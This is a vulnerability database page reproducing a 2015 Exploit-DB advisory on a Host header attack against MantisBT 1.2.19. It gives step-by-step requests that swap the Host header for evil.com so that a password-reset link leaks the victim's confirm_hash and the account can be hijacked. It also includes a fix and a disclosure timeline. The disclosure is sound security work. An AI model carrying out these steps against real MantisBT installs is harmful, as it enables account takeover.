Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mantis Bug Tracker 1.2.19 - Host Header

🗓️ 02 Sep 2015 00:00:00Reported by Pier-Luc MaltaisType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 43 Views

MantisBT 1.2.19 - Host header attack vulnerability allows account hijackin

Code
# Exploit Title: MantisBT 1.2.19 - Host header attack vulnerability
# Date: 07-09-2015
# Exploit Author: Pier-Luc Maltais
				  Centre opérationnel de sécurité informatique gouvernemental (COSIG)
# Vendor Homepage: https://www.mantisbt.org/
# Software Link: http://sourceforge.net/projects/mantisbt/files/mantis-stable/
# Version: 1.2.19
# Contact: https://twitter.com/plmaltais
		   http://plmsecurity.net/mantis_host_header_attack

==========================
Vulnerability Description:
==========================

MantisBT 1.2.19 is vulnerable to an Host header attack that can
be exploited by an unauthenticated user to hijack another user account.
 
==================
Technical Details:
==================

This exploit use the Host header attack to poison the link in the
password reset mail. You need to know the victim username and 
e-mail. You also need a remote host that you control to catch the 
verification hash needed for password reset.

1.  Access the password reset feature and fill the form with the
    victim username and e-mail.

    http://{VULNERABLE_MANTIS}/mantisbt/lost_pwd_page.php

2.  Using an intercepting proxy like Burp, change the Host header 
    with your evil host.

    Original request :
    
    POST /mantisbt/lost_pwd_page.php HTTP/1.1
    Host : {VULNERABLE_MANTIS}
    [...]
    
    Modified request : 
    
    POST /mantisbt/lost_pwd_page.php HTTP/1.1
    Host : evil.com
    [...]
    
3.  When the user receive the e-mail, the link is poisoned with 
    the evil host.

    [...]
    visit the following URL to change your password: 
    http://evil.com/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead 
    [...]
    
4.  Now, when the victim click on the link to reset his password,
    his verification hash will be sent to our evil host. All we 
    have to do is access the verify.php page with his hash, so
    we can change his password and hijack his account.
    
    http://{VULNERABLE_MANTIS}/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead 
 
=========
Solution:
=========

Use 
$_SERVER['SERVER_NAME'] (server controlled) 
instead of 
$_SERVER['HTTP_HOST'] (client controlled)
 
====================
Disclosure Timeline:
====================

16/02/2015 - Found the vulnerability
17/02/2015 - Wrote this advisory
17/02/2015 - Contacted developers on MantisBT forum
18/02/2015 - Opened an issue in the bug tracker
01/09/2015 - Still not patched, releasing this advisory.
 
===========
References:
===========

[1] http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
[2] http://stackoverflow.com/questions/2297403/http-host-vs-server-name/2297421#2297421

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Sep 2015 00:00Current
7.4High risk
Vulners AI Score7.4
mantisbthost header attackaccount hijackingvulnerabilitypassword resethijacksecurity advisorydevelopersbug trackerintercepting proxydisclosure timeline.
43